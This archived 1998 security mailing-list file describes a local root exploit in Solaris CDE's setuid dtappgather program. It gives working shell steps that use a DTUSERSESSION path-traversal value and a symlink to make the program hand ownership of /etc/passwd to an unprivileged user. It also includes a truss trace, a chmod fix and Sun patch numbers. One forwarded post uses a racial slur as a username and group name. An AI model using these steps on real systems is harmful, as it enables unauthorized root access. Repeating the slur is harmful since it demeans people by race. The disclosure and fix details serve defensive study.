dtap2.txt

`  
[ http://www.rootshell.com/ ]  
  
From [email protected] Mon Nov 2 08:12:39 1998  
Date: Mon, 2 Nov 1998 18:05:59 +0100 (MET)  
From: Andrea Costantino <[email protected]>  
To: [email protected], [email protected]  
Subject: another /usr/dt/bin/dtappgather feature!  
  
There's attached the message related to this new feature..  
the /usr/dt/bin/dtappgather program tries to read the enviroment variable  
$DTUSERSESSION to get the name of the file to seek for.  
The file is searched in /var/dt/appconfig/appmanager.  
Under SunOS 5.5,5.5.1 (aka Solaris 2.5, 2.5.1) that directory is 777 or  
01777 so you're able to make a simbolic link to the file you wish, but on  
SunOS 5.6 (Solaris 2.6) the directory is 755 to avoid this.  
Unfortunately the dtappgather never check the $DTUSERSESSION variable, so  
you can use the syntax ../../.. etc... to grab the file you wish, even if  
you can't write the /var/dt/appconfig/appmanager directory....  
  
For example  
  
costan@penelope$ ls -ald /var/dt/appconfig/appmanager  
drwxr-xr-x 9 bin bin 512 Oct 30 11:27 /var/dt/appconfig/appmanager  
  
costan@penelope$ export $DTUSERSESSION=../../../../etc/passwd  
costan@penelope$ /usr/dt/bin/dtappgather  
[.... stuff ....]  
costan@penelope$ ls -al /etc/passwd  
-r-xr-xr-x 1 costan users 531 Oct 9 14:08 /etc/passwd  
  
This way you're satisfied even without making strange link on strange path  
(the name in CDE are very difficult to remember ;-) )  
  
Best Wishes, admins...  
Andrea Costantino (aka k0stan)  
Network Manager at DIIAR  
Politecnico di Milano  
  
  
  
  
  
  
Attached message:  
[ http://www.rootshell.com/ ]  
  
Date: Mon, 23 Feb 1998 15:31:16 +0200  
From: Mastoras <[email protected]>  
Subject: /usr/dt/bin/dtappgather exploit  
  
Buggy program:  
/usr/dt/bin/dtappgather  
  
Description of the problem:  
Local users can change the ownership of any file, thus gaining  
root priviledges. This happens because "dtappgather" does not check if the  
file /var/dt/appconfig/appmanager/generic-display-0 is a symbolic link and  
happily chown()s it to the user. When CERT released advisory CA-98.02  
about /usr/dt/bin/dtappgather, I played a little with dtappgather and  
discovered the problem above, but I thought that patch 104498-02 corrects it,  
as described in SUN's section of 98.02. When I applied the patch, I  
realised that it was still possible to gain root privs.  
  
Systems Affected:  
*At least* SunOS 5.5 & 5.5.1 running CDE version 1.0.2 with suid  
bit on /usr/dt/bin/dtappgather. SunOS 5.6 (or CDE 1.2) comes with  
directory /var/dt/appconfig/appmanager/ mode 755 so it's not possible to  
make the necessary link. On the other hand, in SunOS 5.5* this dir has  
mode 777, so you can easily make the link or even unlink/rename the file  
"generic-display-0" if exists owned by another user.  
  
Quick Fix:  
chmod -s /usr/dt/bin/dtappgather  
  
The Exploit:  
The forwarded exploit was initially posted to hack.gr's security  
mailing list: "haxor".  
  
  
Hack wisely,  
Mastoras  
  
/*  
* Computer Engineering & Informatics Department, Patras, Greece  
* Mastor Wins, Fatality! http://www.hack.gr/users/mastoras  
*/  
  
---------- Forwarded message ----------  
Date: Sat, 24 Jan 1998 02:48:13 +0200 (EET)  
From: Mastoras <[email protected]>  
Reply-To: [email protected]  
To: [email protected], Undisclosed recipients: ;  
Subject: [HAXOR:11] dtappgather exploit  
  
Hello,  
  
I suppose you have learnt about CERT's advisory on dtappgather  
program. Well, here's the exploit:  
  
nigg0r@host% ls -l /etc/passwd  
-r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd  
nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0  
nigg0r@host% dtappgather  
MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists  
nigg0r@host% ls -l /etc/passwd  
-r-xr-xr-x 1 nigg0r niggers 1585 Dec 17 22:26 /etc/passwd  
nigg0r@host% echo "nigg0r wins! Fatality!" | mail root  
  
it would be easy to find the exploit if you had read CERT's advisory.  
the following steps were enough..  
  
% cp /usr/dt/bin/dtappgather . [you can't "truss" suid proggies]  
% truss -o koko ./dtappgather  
% more koko  
[ shity ld things ]  
chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0  
chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0  
[ shitty things ]  
  
I hope this was not too lame or well-known :-)  
  
  
Seeya,  
mastoras  
  
--------------------------------------------------------------------------  
  
Steven Goldberg - SE - Seattle WA ([email protected])  
  
Hi,  
  
Sun has published the following patches to address this  
vulnerability:  
  
patches 104497 CDE 1.0.1: dtappgather patch  
patches 104498 CDE 1.0.2: dtappgather patch  
patches 104499 CDE 1.0.1_x86: dtappgather patch  
patches 104500 CDE 1.0.2_x86: dtappgather patch  
patches 105837 CDE 1.2: dtappgather Patch  
patches 105838 CDE 1.2_x86: dtappgather Patch  
  
  
thanks,  
  
Steve  
`